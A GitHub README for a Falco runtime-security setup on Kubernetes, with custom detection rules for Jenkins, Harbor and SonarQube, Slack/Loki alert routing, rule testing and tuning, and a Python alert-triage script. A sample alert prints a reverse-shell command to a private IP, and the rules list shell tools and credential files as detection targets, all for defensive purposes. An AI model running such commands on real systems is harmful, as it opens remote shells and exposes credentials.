srujantata/runtime-security-falco
GitHub: srujantata/runtime-security-falco
A Falco-based Kubernetes runtime security setup that uses eBPF to monitor system calls, detect anomalous activity inside containers and forward alerts.
Stars: 0 | Forks: 0
# Runtime Security with Falco
[CI status](https://github.com/srujantata/runtime-security-falco/actions)
**Falco** hooks system calls on every Kubernetes node through an eBPF probe and raises an alert the moment a rule matches: a shell started inside Jenkins, an image push from an unknown IP, a container reading `/etc/shadow`. Alerts are forwarded by **Falcosidekick** to Slack for immediate response and to Loki for long-term analysis.
## Architecture
```
Kernel syscalls (eBPF hook)
        │
        ▼
Falco (per-node DaemonSet)
  └── evaluates rules in real time
        │
        ▼ alert JSON
Falcosidekick (single Deployment)
  ├── Slack ──► #security-alerts channel
  └── Loki  ──► Grafana dashboard (long-term)
```
## Custom rules for this DevOps toolchain
The rules are tailored to the services actually running in the cluster (Jenkins, SonarQube, Harbor). Falco's default rules cover generic Linux scenarios; these target *your* stack. One caveat before copying them: `container.label.app` reads the container's own OCI/Docker labels, not Kubernetes pod labels, so it only matches if the image (or the runtime) sets an `app` label. If yours does not, key the condition on `container.image.repository` instead, or on pod labels where your Falco version exposes them.
### Jenkins running an unexpected process
```
# rules/jenkins-rules.yaml
# The list is defined before the rule that references it.
- list: known_jenkins_helper_binaries
  items: [sh, bash, git, ssh, tee, grep, sed, awk, python3]

- rule: Jenkins Running Unexpected Process
  desc: >
    Jenkins should only run Java processes. Anything else (bash, curl, wget, nc)
    could indicate a build escaping its container or a compromised build step.
  condition: >
    spawned_process
    and container.label.app = "jenkins"
    and proc.name != "java"
    and not proc.name in (known_jenkins_helper_binaries)
  output: >
    Unexpected process in Jenkins container
    (proc=%proc.name cmdline=%proc.cmdline user=%user.name
    container=%container.name image=%container.image.repository)
  priority: ERROR
  tags: [jenkins, process, mitre_execution]
```
### Harbor image push from an unknown IP
Falco observes the TCP `accept`, not the HTTP verb, so the syscall layer cannot tell a push from a pull; the rule therefore watches for any inbound connection to `harbor-core` from outside the trusted ranges. The original condition combined `spawned_process` with `fd.sip`, which never fires (an `execve` event carries no file descriptor, and `fd.sip` is the server side anyway); the client address is `fd.cip`, and CIDR matching uses `fd.cnet`.
```
- list: trusted_cidr_ranges
  items: ["10.0.0.0/8", "172.16.0.0/12"]

- rule: Harbor Image Push from Unknown IP
  desc: >
    Inbound connections to harbor-core from IPs outside the cluster CIDR or the
    known CI runner ranges may indicate credential theft or a supply-chain attack.
    Fires on any untrusted client (push or pull), so keep trusted_cidr_ranges tight.
  condition: >
    inbound
    and container.label.app = "harbor-core"
    and not fd.cnet in (trusted_cidr_ranges)
  output: >
    Harbor connection from untrusted source, possible unauthorized image push
    (src_ip=%fd.cip proc=%proc.name container=%container.name)
  priority: CRITICAL
  tags: [harbor, network, supply-chain]
```
If Harbor sits behind an ingress controller or a Service that rewrites the source address, `harbor-core` sees the proxy's pod IP (inside `10.0.0.0/8`) and the rule never sees the real client. It is only meaningful where the client IP is preserved (for example `externalTrafficPolicy: Local` or PROXY protocol on the load balancer).
### SonarQube spawning a shell
```
- list: shell_binaries
  items: [sh, bash, dash, zsh, ksh, fish]

- rule: SonarQube Spawning Shell
  desc: >
    SonarQube is a Java application and should never spawn a shell.
    Shell execution inside SonarQube may indicate RCE via a vulnerable plugin.
  condition: >
    spawned_process
    and container.label.app = "sonarqube"
    and proc.name in (shell_binaries)
  output: >
    Shell spawned inside SonarQube container, possible RCE
    (shell=%proc.name cmdline=%proc.cmdline user=%user.name
    container=%container.name)
  priority: CRITICAL
  tags: [sonarqube, shell, mitre_execution, rce]
```
### Container reading sensitive files
```
- rule: Container Reading Sensitive Host File
  desc: >
    Detect processes in containers reading credential files. fd.name is the path
    as the process sees it, so this matches the container's own /etc/shadow as
    well as a host copy mounted into it.
  condition: >
    open_read
    and container
    and fd.name in (/etc/shadow, /etc/passwd, /root/.ssh/authorized_keys)
  output: >
    Sensitive file read inside container
    (file=%fd.name proc=%proc.name container=%container.name
    image=%container.image.repository)
  priority: WARNING
  tags: [filesystem, credential-access, mitre_credential_access]
```
Expect `/etc/passwd` to be noisy: it is world-readable and every `getpwnam()`-style lookup (login shells, `id`, JVM user resolution) opens it. Falco's own `sensitive_files` list deliberately leaves it out; drop it here too unless you accept the volume, and keep `/etc/shadow` and `authorized_keys`, which legitimate container workloads rarely touch.
## Forwarding alerts through Falcosidekick
### Helm install
```
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm install falco falcosecurity/falco \
  --namespace falco --create-namespace \
  --set driver.kind=ebpf \
  --set falcosidekick.enabled=true \
  --set falcosidekick.config.slack.webhookurl="${SLACK_WEBHOOK_URL}" \
  --set falcosidekick.config.loki.hostport="http://loki.monitoring.svc.cluster.local:3100" \
  --set falcosidekick.config.loki.tenant="falco" \
  --set-file 'customRules.jenkins-rules\.yaml=rules/jenkins-rules.yaml'
```
`--set-file` loads the rules file verbatim; passing it through `--set "$(cat …)"` breaks on the commas and brackets inside the list items. Add one `--set-file` per rule file. The Slack webhook URL is a credential: on the command line it ends up in shell history and in the Helm release manifest, so for anything beyond a lab keep it in a Kubernetes Secret and point the chart at it with `falcosidekick.config.existingSecret`.
### Slack alert format
When a rule fires, Slack receives:
```
🚨 [CRITICAL] SonarQube Spawning Shell
Rule: SonarQube Spawning Shell
Priority: CRITICAL
Time: 2026-05-18T14:23:01Z
Host: ip-10-0-1-45.ec2.internal
Container: sonarqube-7d9f8b6c4-xk2jp
Image: sonarqube:10.4-community
Detail:
shell=bash cmdline=bash -i >& /dev/tcp/10.0.99.1/4444 0>&1
user=sonarqube
Tags: sonarqube, shell, rce
```
## Testing rules with event-generator
Validate the rule files first, then generate matching events in a staging cluster. The sample-event tool is `event-generator` (the falcosecurity/event-generator project), which runs as its own pod and exercises the default ruleset; `falco-driver-loader` only installs the kernel driver and injects nothing. Falco cannot read a hand-written JSON event (`-e` takes a `.scap` capture file), so a custom rule is tested by producing the real event it describes.
```
# Validate syntax and field names. The default rules file comes first because
# the custom rules use its macros (spawned_process, inbound, open_read).
# /etc/falco/rules.d is where the chart mounts customRules.
kubectl exec -n falco daemonset/falco -c falco -- \
  falco -V /etc/falco/falco_rules.yaml -V /etc/falco/rules.d/jenkins-rules.yaml

# Default rules: generate sample syscall events from a dedicated pod
kubectl create namespace event-generator
kubectl run event-generator -n event-generator \
  --image=falcosecurity/event-generator:latest --restart=Never \
  -- run syscall --loop

# Custom rule: `id` is not in known_jenkins_helper_binaries, so this must fire.
# Assumes a Deployment named jenkins in the jenkins namespace.
kubectl exec -n jenkins deploy/jenkins -- id

# Confirm Falco emitted the alert before checking Slack
kubectl logs -n falco -l app.kubernetes.io/name=falco --tail=50 | grep "Jenkins Running"
```
## Tuning false positives
A new rule produces false positives at first. Tune it by narrowing the condition or by moving the allowlist into a macro; decide each allowlisted binary against the rule's own `desc`, since allowlisting the indicators it names blinds the rule.
```
# Before: fires on every build tool Jenkins uses
# (desc/output/priority omitted; unchanged from the rule above)
- rule: Jenkins Running Unexpected Process
  condition: >
    spawned_process and container.label.app = "jenkins"
    and proc.name != "java"

# After: allowlist the legitimate build tools in a macro. curl and wget stay
# out on purpose: the desc lists them as indicators of a compromised build step.
- macro: jenkins_build_tools
  condition: >
    proc.name in (java, git, mvn, gradle, npm, node, python3,
                  sh, bash, tee, grep, awk, sed)

- rule: Jenkins Running Unexpected Process
  condition: >
    spawned_process
    and container.label.app = "jenkins"
    and not jenkins_build_tools
```
## Grafana dashboard (via Loki)
All Critical alerts in the selected time range (Falco writes priorities in title case: `Critical`, `Error`, `Warning`, so `CRITICAL` would match nothing):
```
{job="falco"} | json | priority="Critical" | line_format "{{.time}} {{.rule}} — {{.output}}"
```
Rules ranked by number of firings over the last 7 days:
```
sum by (rule) (count_over_time({job="falco"} | json [7d]))
```
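As an added example (my own code, not part of the srujantata/runtime-security-falco repository), the following Python script does offline what the tuning section and the 7-day LogQL query above do in Grafana: it parses Falco's JSON output (the same objects Falcosidekick forwards), ranks rules by firing count, and for one rule lists the process names that keep tripping it so they can go into an allowlist macro, while a value seen only once (here `nc`) stays out as a likely true positive. The alert lines are constructed sample data; the `output_fields` keys follow the Falco field names used in the rules above, and the `json_output` shape is assumed from Falco's documented JSON format.

```python
"""Offline triage of Falco JSON alerts: top rules and allowlist candidates.

Added example, not part of the runtime-security-falco repository. Assumes
Falco's json_output format: one object per line carrying "rule", "priority",
"time", "output" and "output_fields".
"""
import json
from collections import Counter


def _alert(rule, priority, proc, image, when):
    """Build one constructed alert line in Falco's json_output shape (sample data)."""
    return json.dumps({
        "hostname": "ip-10-0-1-45.ec2.internal",
        "priority": priority,           # Falco uses title case: Critical, Error, Warning
        "rule": rule,
        "source": "syscall",
        "time": when,
        "output": f"{rule} (proc={proc} image={image})",
        "output_fields": {"proc.name": proc, "container.image.repository": image},
    })


JENKINS_RULE = "Jenkins Running Unexpected Process"

# Constructed sample log: ten Jenkins firings (mvn/git/node are build tools,
# nc is the one hit worth looking at), one SonarQube shell, one file read,
# plus a garbled line to show that parsing skips it.
SAMPLE_LOG = "\n".join(
    [_alert(JENKINS_RULE, "Error", proc, "jenkins/jenkins", f"2026-05-18T14:{i:02d}:00Z")
     for i, proc in enumerate(["mvn"] * 4 + ["git"] * 3 + ["node"] * 2 + ["nc"])]
    + [_alert("SonarQube Spawning Shell", "Critical", "bash", "sonarqube",
              "2026-05-18T14:23:01Z"),
       _alert("Container Reading Sensitive Host File", "Warning", "cat", "busybox",
              "2026-05-18T14:30:00Z"),
       "not json at all"]
)


def parse_alerts(text):
    """Parse newline-delimited Falco JSON; drop blank, malformed or non-alert lines."""
    alerts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            obj = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(obj, dict) and "rule" in obj:
            alerts.append(obj)
    return alerts


def top_rules(alerts, priority=None):
    """Firings per rule, busiest first (ties by name); optionally one priority only."""
    counts = Counter(a["rule"] for a in alerts
                     if priority is None or a.get("priority") == priority)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def allowlist_candidates(alerts, rule, field="proc.name", min_hits=2):
    """Values of `field` that repeatedly trip `rule`; values below min_hits stay out."""
    counts = Counter(a.get("output_fields", {}).get(field)
                     for a in alerts if a["rule"] == rule)
    return {v: n for v, n in counts.items() if v is not None and n >= min_hits}


def render_macro(name, field, values):
    """Emit a Falco macro allowlisting `values`, to be used as `and not <name>`."""
    joined = ", ".join(sorted(values))
    return f"- macro: {name}\n  condition: {field} in ({joined})\n"


if __name__ == "__main__":
    parsed = parse_alerts(SAMPLE_LOG)
    for rule_name, n in top_rules(parsed):
        print(f"{n:4d}  {rule_name}")
    candidates = allowlist_candidates(parsed, JENKINS_RULE)
    print(render_macro("jenkins_build_tools", "proc.name", candidates))
```

Run it against a real export by replacing `SAMPLE_LOG` with the contents of `kubectl logs` from the Falco pods (with `json_output: true`) or a Loki export. The threshold keeps the script honest: a binary that shows up once is exactly the event the rule exists for, so it is never proposed for the allowlist, and every candidate still needs a human to check it against the rule's `desc` before it goes into the macro.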
## Skills demonstrated
- Deploying Falco as a DaemonSet on Kubernetes with the eBPF driver
- Writing Falco rules tailored to specific DevOps tools (Jenkins, Harbor, SonarQube)
- Routing alerts to multiple destinations (Slack + Loki) with Falcosidekick
- Testing rules with event-generator and targeted probes
- Tuning false positives with macros and allowlists
- Grafana/LogQL dashboards for security event analysis
- MITRE ATT&CK tags on detection rules